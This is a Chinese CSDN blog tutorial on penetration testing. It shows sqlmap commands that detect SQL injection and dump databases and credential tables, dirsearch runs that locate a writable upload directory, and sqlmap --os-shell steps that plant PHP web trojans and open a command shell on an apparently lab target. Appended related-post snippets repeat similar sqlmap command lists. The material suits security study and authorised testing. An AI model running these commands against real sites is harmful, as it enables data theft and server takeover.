sqlmap如何用dirsearch.py协助--os -shell拿到目标网站shell

最新推荐文章于 2024-07-11 22:08:09 发布
最新推荐文章于 2024-07-11 22:08:09 发布
阅读量987 收藏 5
点赞数 3
分类专栏: SQL注入 文章标签: 数据库 shell 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/king_ho/article/details/110094510
版权

本文为博主原创文章首发于FreeBufhttps://www.freebuf.com/sectool/256588.html

SQLMAP

sqlmap是一个开源渗透测试工具, 它可以自动检测和利用SQL注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。

安装

windows
1、安装python(2.x或3.x版本)
https://www.python.org/downloads/
2、下载sq|map并解压
http://sqlmap.org/
3、在sqlmap路径下打开cmd, python sqlmap.py即可运行
linux
1、kali系统自带
2、git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap -dev
常用命令:
1、sqlmap.py -u "url" 检测目标url是否存在注入
2、sqlmap -u "url" --dbs 爆出所有数据库信息
3、sqlmap -u "url" --current-db爆出当前数据库信息
4、sqlmap -u "url" -D Database_ name -tables 列出指定库名的所有表名
5、sq|map -u "url" -D Database_ name -T Table_ name --columns列出指定库名指定表名的所有列名
6、sqlmap -u "url" -D Database_ name -T Table_ name -C columns1,colunms2, columns3 --dump列出指定库名指定表名指定字段的数据

POST注入

1、sqlmap -r /root/aaa.txt --dbs --batch
2、sqlmap -r /root/aa.txt --current-db
3、sqImap -r /root/aaa.txt -D hetianlab --tables
4、sqlmap -r /root/aaa.txt -D hetianlab -T user_ pwd --dump

–os-shell

sqlmap -r /root/aaa.txt -p id --is-dba
sqlmap -r /rootaaa.txt -p id --os-shell
os-shell的执行条件有三个:
(1)网站必须是root权限
(2)攻击者需要知道网站的绝对路径
(3) GPC为off, php主动转义的功能关闭
当着三个条件都满足的时候,–os-shell命令才执行。

which web application Language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default ) #默认
what do you want to use for writable directory?
[1] common Location(s) ( /var/ww/, /var/www/html, /var /www/htdocs, /usr/Local/ apache2/htdocs,/usr/local/www/data, /var/apache2/htdocs, /var/www/ nginx- default, /srv/www/htdocs’) (default)
[2] custom Location(s) #自定义
[3] custom directory list file
[4] brute force search

话说回来,我们如何知道这个网站是不是root权限呢?
我们可以执行以下两个命令来查看网站当前的用户
sqLmap -u "http://172 .26.2.36/vulnlab/ index . php?id=1" --current -user
current --user查看当前的用户
sqLmap -u "http://172 .26.2.36/vulnlab/ index . php?id=1" --is -dba
指定去查找这个文件是否为dba,dba是databaseadmin,是数据库管理员用户的意思,如果返回值为true,则是root用户
这两个命令都可以🙆‍

查查目录[dirsearch.py]

dirsearch是一个基于python的命令行工具,旨在暴力扫描页面结构,包括网页中的目录和文件。
dirsearch拥有以下特点:

  • 多线程
  • 可保持连接
  • 支持多种后缀(-e|–extensions asp,php)
  • 生成报告(纯文本,JSON)
  • 启发式检测无效的网页
  • 递归的暴力扫描
  • 支持HTTP代理
  • 用户代理随机化
  • 批量处理
  • 请求延迟

扫描器与字典
字典必须是文本文件,除了使用特殊的%EXT%之外,其余每行都会被处理。
例:
example/
example.%EXT%

使用扩展名“asp”和“aspx”会生成下面的字典:
example/
example.asp
example.aspx

Linux下的使用示例:
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch/
./dirsearch.py -u 目标网址 -e *
点击下载地址下载dirsearch-master并解压,将shell位置处于该脚本根目录,由于dirsearch需要python3.x,所以在使用前需要访问python.org下载相应版本的python,最后执行python3 dirsearch.py -u xxxxxx来使用。
-u意为url,添加URL时可以添加他的协议头,但不要添加他的访问目录。
-e指定查找的类型,如 -e dir意为指定查找目录信息,可帮助我们知道哪里可能存在上传的权限。-e php指定PHP语言类型,可以帮助我们查找是否有PHP语言的关键信息泄露。
常见的脚本语言类型有:
ASP
ASPX(ASP.NET)
JSP
PHP
扫描目录过程

它是利用爬虫和自带的字典爆破脚本进行的扫描。
如上图的返回值信息,如果是200、403、301这些数值的话,证明它是存在该目录/文件的。
再来观察上图的扫描过程中的结果,出现了一个upload,upload也就是上传,所谓上传,一般情况下我们是对此目录有可写权限的。
那么他的完整路径是什么呢?
根据在学校上学习的Apache服务建站,可以知道该网站如果是部署在Linux系统上,网站的默认根目录是/var/www/html或者是/var/www/。小型网站一般都不会改这个目录,那么upload的完整目录很有可能是/var/www/html/upload/var/www/upload,两个都可以试一下

回到-os shell上

①选择脚本语言选择4-PHP
②我们已经知道路径了,选择2-custom directory list file(自定义路径)
③输入我们知道的路径/var/www/html/upload
在这里插入图片描述
当我们看到shell为os-shell>的时候就代表成功了🎉
我们看到sqlmap给/var/www/html/upload目录里上传了两个PHP文件,tmpuknio.phptmpbepcb.php由于他们两个的存在才拿到了这个权限,那么这两个PHP文件是属于web木马,这些文件的权限也就是php运行的权限,PHP是在Apache服务商运行的,我们可以通过whoami来验证是否正确
os-shell>
whoami

bosoun_ho
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap-master.zip
12-31
只适合python2,视情况下载
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap的脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs //列数据库 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables -D DB_NAME //列DB_NAME的表 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME //读取TB_NAME中的列 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell //取得一个shell
sql注入之getshell方式
最新发布
m0_52484587的博客
07-11 1153
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
SQLMAP使用之获取shell
qq_57774303的博客
12-06 49
忘记进入管理员模式了。
shell 写入文件_文件上传的一个骚操作(低权限+bypassAV)
weixin_39976499的博客
01-22 433
各位在渗透中是否遇见过这个问题:虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令:其中包括杀软或某狗、某盾:...
渗透框架
u012922879的博客
08-22 1168
一 信息收集 1是否存在CDN 2服务器信息 IP 支持脚本 容器版本 开放端口情况(21,22,80,1433,5900,3306,3389,8080,43958) 绝对路径(报错页面显示、探针显示)) 3子域名查询 4 whois 查询域名所有者的信息和邮箱 生成破解字典 5 指纹验证 核实目标站点采用何种cms搭建 然后定制方案 御剑指纹识别 云悉指纹识别 ...
sqlmap写文件为空之谜
weixin_33859665的博客
05-08 951
恰逢有一个SQL注入可以通过sqlmap进行,而且权限高得离谱,直接就是root权限。既然是root权限当然是想直接getshell咯。可是只是sqlmap -u xxx --os-shell的时候却失败了 $ sqlmap -u 'http://php.0day5.com/login.php' --data='user=josh&pass=pass' --o...
sqlmap基础注入
elliaaa的博客
10-09 636
sqlmap基础注入 判断有无注入 python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --batch 注入数据库 python sqlmap.py -u “http://192.168.1.1/list.php?id=1” --dbs --batch 注入表 python sqlmap.py -u “http://192.168.1.1/list.php?id=1” -D KM --tables --batch 注入字段 python sqlmap
sqlmap 使用教程
weixin_46962006的博客
11-14 2万+
                       sqlmap 使用教程 前言        个人观点,若有误请指教 Options(选项) -h:帮助文档 -‌-version:查看sqlmap版本信息 -v:显示详细信息    ·0:只显示python的错误和一些严重性的信息    ·1:显示基本信息(默认)    ·2:显示debug信息    ·3:显示注入过程的payload    ·4:显示http请求包    ·5:显示http响应头    ·6:显示http响应页面 Target(目标
SQLMAP使用教程
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1694
用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.
渗透测试基础篇——sqlmap,nmap,burp工具使用
kreas的博客
05-31 1583
源系统向目标系统发一个 syn 请求,请求中包含一个端口号,如果目标端口开启,目标系统通过 syn/ack 来响应源系统,源系统通过 rst 响应目标系统,来断开连接。可以选择主动扫描或者被动扫描,主动扫描过程中会发送新的请求 payload 验证漏洞,被动扫描时 bp 不会重新发送请求,在已经存在的请求和应答分析。使用 FIN 进行测试,T 表示扫描过程中的时序(0-5),值越高扫描速度越快,容易被防火墙屏蔽。主动扫描:xss,http 头注入,重定向,sql 注入,命令行注入,文件遍历、
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap工具使用
huangyongkang666的博客
03-21 3735
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
Sqlmap使用详解
热门推荐
谢公子的博客
12-01 2万+
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定数据库中的所有的表 爆出指定数据库指定表中的所有的列 爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
sqlmap使用方法
天上掉馅饼
02-25 1222
sqlmap使用方法
[WEB安全]Dirsearch工具命令
baguangman5501的博客
09-05 1239
下载项目,并打开 ┌─[root@kali]─[/kali] └──╼ #git clone https://github.com/maurosoria/dirsearch ┌─[root@kali]─[/kali] └──╼ #cd dirsearch/ 运行需要python3环境 ┌─[root@kali]─[/kali/dirsearch] └──╼ #python3 dirsea...
Kali字典正确使用姿势
zegeai的博客
01-24 8712
0x01 Wordlists 终端输入wordlists,可以查看自带字典。ls -al 查看具体路径 /usr/share/wordlists/目录下带了rockyou的字典。2009年一家名叫rockyou的公司遭到了黑客攻击,他们的密码列表以明文存储,黑客下载了所有的密码列表并且公开。rockyou.txt包含14341564个唯一密码,用于32603388个帐户。 rockyou.txt被压缩,需要解压才能够使用 gzip -d /usr/share/wordlists/rockyou.txt
kali-dirsearch
山兔的博客
09-12 2456
dirsearch是一个python3开发的目录扫描工具,目的是扫描网站的敏感文件和目录从而找到突破口。 dirsearch使用: -u 指定网址 -e 指定网站语言 -w 指定字典 -r 递归目录(跑出目录后,继续跑目录下面的目录) -random-agents 使用随机UA python dirsearch.py -u 网址 -e * 模板:python dirsearch.py -u http://5073135b-4e2c-4551-b64f-242d901d8076.chall
linux 内置字典路径,Kali 系统自带字典目录wordlists
weixin_42123296的博客
05-09 3321
路径:/usr/share/wordlists/dirbbig.txt #大的字典small.txt #小的字典catala.txt #项目配置字典common.txt #公共字典euskera.txt #数据目录字典extensions_common.txt #常用文件扩展名字典indexes.txt #首页字典mutations_common.txt #备份扩展名spanish.txt #方法...
sqlmap (--os-shell)的使用
07-28
sqlmap是一款用于自动化SQL注入和数据库接管的工具。使用--os-shell参数可以在受攻击的目标上执行操作系统命令。首先,用户需要具备dba权限才能使用--os-shell参数\[1\]。然后,可以通过以下命令来攻击目标并获取操作系统shell: ``` sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os-shell ``` 在使用--os-shell参数之前,需要确保Mysql数据库的secure_file_priv参数允许导入导出操作\[2\]。如果secure_file_priv参数的值为null,表示不允许导入导出操作,需要管理员修改该参数的值。在Mysql 5.7版本以上,默认情况下secure_file_priv参数的值为null,因此需要管理员修改该参数的值才能使用--os-shell参数\[2\]。 使用--os-shell参数的原理是通过使用into outfile函数上传两个php文件,一个用于上传文件,另一个用于执行系统命令并返回结果\[3\]。这样就可以在目标系统上执行操作系统命令。 请注意,使用sqlmap进行攻击是非法的,仅用于安全测试和研究目的。 #### 引用[.reference_title] - *1* *2* *3* [sqlmap —— os-shell参数分析](https://blog.csdn.net/qq_43531669/article/details/120630864)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

bosoun_ho

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值